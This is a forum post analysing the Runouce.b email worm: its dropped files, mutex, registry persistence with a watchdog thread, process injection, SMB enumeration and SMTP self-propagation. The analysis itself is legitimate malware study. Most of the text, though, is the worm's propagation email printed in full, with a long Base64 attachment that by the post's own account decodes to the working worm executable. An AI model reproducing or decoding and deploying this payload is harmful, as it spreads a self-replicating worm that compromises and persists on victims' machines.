flyleaf posted on 2009-4-9 11:13

Analysis of Worm/Win32.Runouce.b [Email]

I. Sample profile:
Virus name: Worm/Win32.Runouce.b
Virus type: Worm
File MD5: 5BCD5AC1E81E9AD7D75B031DA6DF401B
Disclosure scope: Fully public
Severity level: 4
File size: 126,976 bytes
Affected systems: Windows 98 and later
Development tool: Microsoft Visual Basic 5.0 / 6.0

II. Description:
This sample is a worm. The file is packed (encrypted) on disk. When run, it brute-force searches memory for the kernel32 base address and from there resolves a large number of API addresses at run time (the decoded attachment below uses the same technique: walk back page by page from a stack address until an MZ header is found, then scan the export table for GetProcAddress). It creates a mutex named "ChineseHacker-2" so that only one instance runs at a time. It opens its own file with the hidden attribute via the API, creates the files runouce.exe and KillEDLL.DLL in the %System32% directory, writes the virus code into them section by section, attempts to inject the DLL into every process, and sets the hidden attribute on the dropped files. It adds a registry autorun entry and starts a thread that monitors that registry key; if the autorun value is deleted it is rewritten immediately. It drops a readme.eml file in several system directories; this file is the mail the worm sends. The attachment in that mail is Base64-encoded rather than encrypted: Base64 keeps the raw PE bytes out of the .eml so naive signature scanning of the file misses them, but any decoder recovers the executable, which is the worm body itself. The worm sends the malicious mail through the system's own Outlook Express, and these mails are how it propagates.

III. Behaviour analysis:
Local behaviour:
1. On execution the following files are dropped:
%System32%\KillEDLL.DLL
%System32%\MSWBPROTECT.DLL
%System32%\runouce.exe
%Program Files%\Common Files\Microsoft Shared\Stationery\readme.eml
%Program Files%\Common Files\System\ado\readme.eml
%Program Files%\NetMeeting\readme.eml

2. The file is packed. On execution it brute-force searches for the kernel32 base address, resolves a large number of API addresses dynamically, and calls CreateMutexA to create a mutex named "ChineseHacker-2" so that only one instance runs at a time (a second instance finds the mutex already present and exits).

3. Adds a registry autorun entry
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: Runonce (REG_SZ) = "C:\WINDOWS\system32\runouce.exe"
Description: persistence through the Run key. Note that "Runonce" is a value name under Run, not the legitimate RunOnce key that sits next to it, so it is easy to overlook in an autorun listing.

4. Opens its own file with the hidden attribute via the API, creates the file runouce.exe in the %System32% directory, writes the virus code into it section by section, and sets the hidden attribute. It adds the registry autorun entry and starts a thread that watches the registry (the decoded body imports RegNotifyChangeKeyValue for this); if the entry is deleted it is immediately rewritten, so deleting the value without first killing the monitor thread does not remove the persistence.

5. Drops a readme.eml file in the system directories listed above; this file is the mail the worm sends. The attachment is Base64-encoded (an encoding, not encryption, used to get the PE past scanners that only look at the raw .eml); decoding it yields a PE executable, the worm body. The worm sends the mail through the system's own Outlook Express.

Network behaviour:
Protocol: TCP
Ports: 139, 445 (NetBIOS/SMB) and 25 (SMTP)
Description: Ports 139 and 445 are SMB, not mail; they match the network-share enumeration functions the decoded body imports from MPR.DLL (WNetOpenEnumA, WNetEnumResourceA, WNetCloseEnum). The mail itself goes out over SMTP: the decoded code resolves btamail.net.cn with gethostbyname, passes port 25 to htons, connects through WSOCK32 and sends the dialogue below. RCPT TO and TO are empty in this dump because in the binary they are %s placeholders that wsprintfA fills in at run time; the "comming" misspelling in SUBJECT is the worm's own string. The mail content is:
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO:
DATA
FROM: A-738DF22C9CA04@yahoo.com
TO:
SUBJECT: A-738DF22C9CA04 is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"
--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>
--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name="pp.exe"
Content-Transfer-Encoding: base64
Content-id: THE-CID
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAtSzvggAAAAAAAAAA4ACOgQsBAhkAAgAAAAYAAAAAAAAARAAAABAAAAAgAAAAAEAAABAAAAACAAABAAAAAAAAAAMACgAAAAAAAGAAAAAEAAAAAAAAAgAAAAAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADAAAE4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAAAAEAAAABAAAAACAAAABgAAAAAAAAAAAAAAAAAAIAAAYERBVEEAAAAAABAAAAAgAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAMAuaWRhdGEAAAAQAAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAADALnJlbG9jAAD8HQAAAEAAAPwdAAAADAAAAAAAAAAAAAAAAAAAQAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw/8lMDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgwAAAAAAAAAAAAADgwAAAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGMAAAAAAAAEYwAAAAAAAAS0VSTkVMMzIuZGxsAAAAAFNsZWVwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAwAAAADMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGDo5hkAAIt0JCDoCAAAAGFoABBAAMPpWegBFgAAgeYA8P//ge4AEAAAZoE+TVp18w+3fjwD/otveAPui10gA94zwIvWg8MEQIs7A/roDwAAAEdldFByb2NBZGRyZXNzAF4zybEP/POmddqL8otdJAPeD7cMQ4tdHAPeixyLA96B7PwAAACL/Im0JOAAAADoXgQAAIvpVv/T/KuLzeL1iwQk6AsAAABVU0VSMzIuRExMAP/Qi/DoywYAAIvpVv/T/KuLzeL1iwQk6A0AAABBRFZBUEkzMi5ETEwA/9CL8OgdBwAAi+lW/9P8q4vN4vWLBCToCAAAAE1QUi5ETEwA/9CL8OhcBwAAi+lW/9P8q4vN4vWLBCToDAAAAFdTT0NLMzIuRExMAP/Qi/DofAcAAIvpVv/T/KuLzeL1i/ToEAAAAENoaW5lc2VIYWNrZXItMgBqAGoA/1YE/1YIC8B0Aszp/1YMagFQ/1YQ6GgBAACL9OgNAAAAi/RoYOoAAP9WROvv6VnolRQAAOglCgAAjYIeAQAA
iQLoDAoAAI1CLZCQkIkC6GEIAADo+gkAAI1CO5CQkIkC6HYIAADo9AkAAI2ClwAAAIkC6NsJAACNQi2QkJCJAugwCAAA6MkJAACNQjuQkJCJAuhFCAAAi4boAAAAaGDqAABQ/1Zkg/j/dFxW6EoAAABe6DsAAABOZXQgU2VuZCAqIE15IGdvZCEgU29tZSBvbmUga2lsbGVkIENoaW5lc2VIYWNrZXItMiBNb25pdG9yAFhqAFD/VhDrnFnoyRMAAOhaAQAA6egAAAAAX4uGjAAAAImH/RUAAIuGlAAAAImHERYAAIuGmAAAAImHJhYAAItGRImHZhYAAI2HvBUAAFBUagBQUGoAagD/VnSL2FiLhugAAABoYOoAAFD/VmRQagBT/1Z4WIP4/3QCzOlW6AMAAABe69lZ6E0TAADo3gAAAOlZ6EETAACB7AABAABU6OwGAACL/GoQV/9WcIP4/3Qdi9johRMAAGoAagBT/1Y8U+hjCwAAi/xqB1f/VihQVOguAAAAU09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuAGgCAACA/5agAAAAW4vE6AgAAABSdW5vbmNlAFloAAEAAFBqAWoAUVP/lqQAAADoAAAAAF+LhqgAAACJh4QVAACLhqQAAACJh64VAACLhqwAAACJh5kVAACNh10VAABQVGoAU1BqAGoA/1Z0WDPAiYboAAAAgewAAQAAVOgNBgAA6AAAAABfi0ZQiYd7FQAAi0ZkiYeXFQAAi0YQiYeyFQAAi0ZIC8B0b2oBagD/0IuW4AAAAA+3WjwD2ouLBAEAAItrVCvNgfkAAgAAckgD6o2XchUAAGpOkJCQkFVS6GQVAACNTU6QkJCL1GgAAQAAUVLoUBUAAP9WTFBUagBQVWoAagD/VlyJhugAAABYaPQBAAD/VkTM6WoAagD/lowAAABQVFD/logAAABqAGj/Dx8A/1ZQC8B0b4vYakBoABAAAGgAAgAAagBT/1ZoC8B0S4vojZdyFQAAUFRqTpCQkJBSVVP/VlRYg/hOkJCQdSyL1I1NTpCQkFBUaAABAABSUVP/VlT/VkxUagBQVWoAagBT/1ZYiYboAAAAWFP/VmBo9AEAAP9WRMzpWIvM6A4AAABHZXRTeXN0ZW1UaW1lAOgRAAAAR2V0Q29tcHV0ZXJOYW1lQQDoFAAAAFdpZGVDaGFyVG9NdWx0aUJ5dGUA6BAAAABUZXJtaW5hdGVUaHJlYWQA6A0AAABDcmVhdGVUaHJlYWQA6AgAAABfbGNyZWF0AOgUAAAAR2V0U3lzdGVtRGlyZWN0b3J5QQDoDwAAAFZpcnR1YWxBbGxvY0V4AOgUAAAAV2FpdEZvclNpbmdsZU9iamVjdADoDAAAAENsb3NlSGFuZGxlAOgTAAAAQ3JlYXRlS2VybmVsVGhyZWFkAOgTAAAAQ3JlYXRlUmVtb3RlVGhyZWFkAOgTAAAAV3JpdGVQcm9jZXNzTWVtb3J5AOgMAAAAT3BlblByb2Nlc3MA6BQAAABHZXRDdXJyZW50UHJvY2Vzc0lkAOgXAAAAUmVnaXN0ZXJTZXJ2aWNlUHJvY2VzcwDoBgAAAFNsZWVwAOgIAAAAX2xjbG9zZQDoCAAAAF9sbHNlZWsA6AgAAABfbHdyaXRlAOgHAAAAX2xyZWFkAOgHAAAAX2xvcGVuAOgMAAAAU2V0RmlsZVRpbWUA6BMAAABTZXRGaWxlQXR0cmlidXRlc0EA6AoAAABGaW5kQ2xvc2UA6A4AAABGaW5kTmV4dEZpbGVBAOgPAAAARmluZEZpcnN0RmlsZUEA6BUAAABTZXRDdXJyZW50RGlyZWN0b3J5QQDoDgAAAEdldERyaXZlVHlwZUEA6AgAAABXaW5FeGVjAOgQAAAAR2V0Q29tbWFuZExpbmVBAOgNAAAAR2V0TGFzdEVycm9yAOgNAAAAQ3JlYXRlTXV0ZXhBAOgNAAAA
TG9hZExpYnJhcnlBACvMwekC/+DpWIvM6AoAAAB3c3ByaW50ZkEA6A0AAABTZW5kTWVzc2FnZUEA6AoAAABHZXRXaW5kb3cA6AwAAABNZXNzYWdlQm94QQDoDAAAAEZpbmRXaW5kb3dBAOgZAAAAR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkACvMwekC/+DpWIvM6BgAAABSZWdOb3RpZnlDaGFuZ2VLZXlWYWx1ZQDoEQAAAFJlZ1F1ZXJ5VmFsdWVFeEEA6A8AAABSZWdTZXRWYWx1ZUV4QQDoDAAAAFJlZ09wZW5LZXlBACvMwekC/+DpWIvM6A4AAABXTmV0Q2xvc2VFbnVtAOgSAAAAV05ldEVudW1SZXNvdXJjZUEA6A4AAABXTmV0T3BlbkVudW1BACvMwekC/+DpWIvM6AUAAAByZWN2AOgMAAAAY2xvc2Vzb2NrZXQA6AcAAABzb2NrZXQA6AgAAABjb25uZWN0AOgOAAAAZ2V0aG9zdGJ5bmFtZQDoBgAAAGh0b25zAOgFAAAAc2VuZADoCwAAAFdTQUNsZWFudXAA6AsAAABXU0FTdGFydHVwACvMwekC/+DpWIvM6AwAAADHubHQwO666da+IQDoEAAAAMily/vC6LXEt6jC1rmmIQDoEwAAALe0ttTQsL3MLLPnydC/xtGnIQDoDAAAALTytbmxvsCttcchAOgQAAAAz/LTotDbzfXOsNbC0uIhAOgOAAAAt7S21LDUyKjW99LlIQDoDgAAAMrAvefQ6NKqus3GvSEA6AwAAADJ57vh1vfS5brDIQArzP/g6cgAAABgi30IaAABAABX/1ZsA/joDQAAAFxydW5vdWNlLmV4ZQBeuRAAAAD886RhycIEAOm5GAAAALpDOlwAUVJU/1YUg/gCcguD+AV0BlToqAAAAFpCWeLlw+kz/+g4AAAA6CkAAADoGgAAAOgLAAAAi0cUUOiCAAAAw+lXagHoIAAAAMPpV2oC6BYAAADD6VdqAugMAAAAw+lXagLoAgAAAMPpyAAAAGBQVP91DP91CGoBagL/lrAAAABbC8B1NoHsABAAAIvUagGLxGgAEAAAVFJQU/+WtAAAAFlZC8B1CIv8/1UQ697pU/+WuAAAAIHEABAAAGHJwgwA6cgAAABgi0UIiwANICAgID13aW5udHY9d2luZHRv/3UI/1YY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